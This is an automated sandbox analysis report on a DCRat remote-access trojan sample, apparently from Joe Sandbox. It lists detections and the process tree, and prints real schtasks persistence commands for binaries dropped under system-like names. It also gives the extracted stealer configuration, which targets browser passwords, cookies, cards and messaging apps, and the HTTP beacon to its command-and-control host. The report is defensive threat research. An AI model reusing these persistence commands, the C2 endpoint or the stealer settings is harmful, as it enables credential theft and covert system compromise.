
Windows Analysis Report
cDouNOFXle.exe

Overview

General Information

Sample Name: cDouNOFXle.exe
Analysis ID: 679544
MD5: 54172888b473f2515b13fe1e2032a112
SHA1: fc4ff4d53a1ea6cfee9265840bfc1dda0ee8c1e6
SHA256: 05379ea4600304f51cffa8d1ee9e3b2931a69129f6bed14d45a500d966a71fca
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected DCRat
Creates processes via WMI
Machine Learning detection for sample
Machine Learning detection for dropped file
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
File is packed with WinRar
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • cDouNOFXle.exe (PID: 3632 cmdline: "C:\Users\user\Desktop\cDouNOFXle.exe" MD5: 54172888B473F2515B13FE1E2032A112)
    • wscript.exe (PID: 5792 cmdline: "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • cmd.exe (PID: 5824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chainsavesref.exe (PID: 3372 cmdline: C:\comproviderRuntimecommon\chainsavesref.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 5100 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5208 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5296 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 1100 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5284 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • MrsUvRPGeImAhc.exe (PID: 3432 cmdline: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 3056 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2232 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5800 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 4592 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • MrsUvRPGeImAhc.exe (PID: 2756 cmdline: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 2072 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5100 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\explorer.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 4036 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 4200 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • explorer.exe (PID: 1820 cmdline: C:\Recovery\explorer.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 5304 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • explorer.exe (PID: 5580 cmdline: C:\Recovery\explorer.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)
  • schtasks.exe (PID: 3896 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5280 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 6024 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5608 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 6056 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • cleanup
{"SCRT": "{\"l\":\"@\",\"w\":\"#\",\"I\":\"`\",\"Y\":\"$\",\"M\":\"%\",\"i\":\",\",\"D\":\"&\",\"N\":\"-\",\"5\":\" \",\"P\":\"~\",\"s\":\")\",\"K\":\"*\",\"3\":\";\",\"m\":\"^\",\"c\":\">\",\"Q\":\"<\",\"2\":\"(\",\"S\":\"_\",\"O\":\"!\",\"y\":\".\",\"0\":\"|\"}", "PCRT": "{\"l\":\"|\",\"6\":\"&\",\"G\":\"<\",\"I\":\"^\",\"0\":\")\",\"p\":\"!\",\"y\":\",\",\"n\":\".\",\"X\":\"*\",\"M\":\"$\",\"=\":\">\",\"9\":\" \",\"b\":\"~\",\"S\":\";\",\"d\":\"@\",\"Y\":\"(\",\"c\":\"#\",\"w\":\"`\",\"i\":\"-\",\"e\":\"%\",\"j\":\"_\"}", "TAG": "FUCKYOUTEST", "MUTEX": "DCR_MUTEX-02ykwxZSRSiKYAzrbrFg", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
Source | Rule | Description | Author | Strings
00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
(5 of 8 Yara matches shown)
No Sigma rule has matched
No Snort rule has matched

            AV Detection

Source: cDouNOFXle.exe | Virustotal: Detection: 53%
Source: cDouNOFXle.exe | Metadefender: Detection: 40%
Source: cDouNOFXle.exe | ReversingLabs: Detection: 60%
Source: cDouNOFXle.exe | Avira: detected
Source: C:\Recovery\ShellExperienceHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\comproviderRuntimecommon\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\comproviderRuntimecommon\backgroundTaskHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Recovery\winlogon.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Recovery\explorer.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\comproviderRuntimecommon\chainsavesref.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Recovery\conhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Recovery\ShellExperienceHost.exe | Virustotal: Detection: 54%
Source: C:\Recovery\ShellExperienceHost.exe | ReversingLabs: Detection: 70%
Source: C:\Recovery\conhost.exe | Virustotal: Detection: 54%
Source: C:\Recovery\conhost.exe | ReversingLabs: Detection: 70%
Source: C:\Recovery\explorer.exe | Virustotal: Detection: 54%
Source: C:\Recovery\explorer.exe | ReversingLabs: Detection: 70%
Source: C:\Recovery\winlogon.exe | Virustotal: Detection: 54%
Source: C:\Recovery\winlogon.exe | ReversingLabs: Detection: 70%
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Virustotal: Detection: 54%
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | ReversingLabs: Detection: 70%
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe | ReversingLabs: Detection: 70%
Source: C:\comproviderRuntimecommon\RuntimeBroker.exe | ReversingLabs: Detection: 70%
Source: C:\comproviderRuntimecommon\backgroundTaskHost.exe | ReversingLabs: Detection: 70%
Source: C:\comproviderRuntimecommon\chainsavesref.exe | ReversingLabs: Detection: 70%
Source: cDouNOFXle.exe | Joe Sandbox ML: detected
Source: C:\Recovery\ShellExperienceHost.exe | Joe Sandbox ML: detected
Source: C:\comproviderRuntimecommon\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\comproviderRuntimecommon\backgroundTaskHost.exe | Joe Sandbox ML: detected
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Joe Sandbox ML: detected
Source: C:\Recovery\winlogon.exe | Joe Sandbox ML: detected
Source: C:\Recovery\explorer.exe | Joe Sandbox ML: detected
Source: C:\comproviderRuntimecommon\chainsavesref.exe | Joe Sandbox ML: detected
Source: C:\Recovery\conhost.exe | Joe Sandbox ML: detected
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe | Joe Sandbox ML: detected
Source: 0.3.cDouNOFXle.exe.5528b46.0.unpack | Avira: Label: VBS/Runner.VPG
Source: 0.3.cDouNOFXle.exe.5557b46.1.unpack | Avira: Label: VBS/Runner.VPG
Source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"l\":\"@\",\"w\":\"#\",\"I\":\"`\",\"Y\":\"$\",\"M\":\"%\",\"i\":\",\",\"D\":\"&\",\"N\":\"-\",\"5\":\" \",\"P\":\"~\",\"s\":\")\",\"K\":\"*\",\"3\":\";\",\"m\":\"^\",\"c\":\">\",\"Q\":\"<\",\"2\":\"(\",\"S\":\"_\",\"O\":\"!\",\"y\":\".\",\"0\":\"|\"}", "PCRT": "{\"l\":\"|\",\"6\":\"&\",\"G\":\"<\",\"I\":\"^\",\"0\":\")\",\"p\":\"!\",\"y\":\",\",\"n\":\".\",\"X\":\"*\",\"M\":\"$\",\"=\":\">\",\"9\":\" \",\"b\":\"~\",\"S\":\";\",\"d\":\"@\",\"Y\":\"(\",\"c\":\"#\",\"w\":\"`\",\"i\":\"-\",\"e\":\"%\",\"j\":\"_\"}", "TAG": "FUCKYOUTEST", "MUTEX": "DCR_MUTEX-02ykwxZSRSiKYAzrbrFg", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
Source: cDouNOFXle.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: cDouNOFXle.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: cDouNOFXle.exe
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0006A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0007B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\cDouNOFXle.exe | Code function: 0_2_0008AAA8 FindFirstFileExA,
Source: Joe Sandbox View | IP Address: 141.8.195.65 141.8.195.65
Source: global traffic | HTTP traffic detected:
    GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: a0702220.xsph.ru
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1
    Accept: */*
    Content-Type: text/csv
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Host: a0702220.xsph.ru
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 05 Aug 2022 22:53:01 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Fri, 05 Aug 2022 22:53:01 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b
68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a0702220.xsph.ru
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362379963.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a0702220.xsph.ru/
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a0702220.xsph.ru8
Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362800777.00000000030FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a0702220.xsph.rux
